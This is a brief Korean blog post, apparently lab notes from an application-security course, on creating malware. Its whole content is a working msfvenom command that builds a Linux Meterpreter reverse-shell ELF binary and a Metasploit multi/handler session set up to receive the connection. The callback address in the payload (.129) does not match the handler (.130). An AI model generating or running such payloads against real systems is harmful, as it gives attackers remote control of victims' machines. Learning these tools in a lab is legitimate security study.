정보보안

애플리케이션 보안 #9 악성코드

Chloe A 2022. 12. 12. 16:04

악성코드를 제작

sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.126.129 LPORT=5555 -f elf > a.elf

 

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.126.130 LHOST => 192.168.126.130 msf6 exploit(multi/handler) > set LPORT 5555 LPORT => 5555 msf6 exploit(multi/handler) > exploit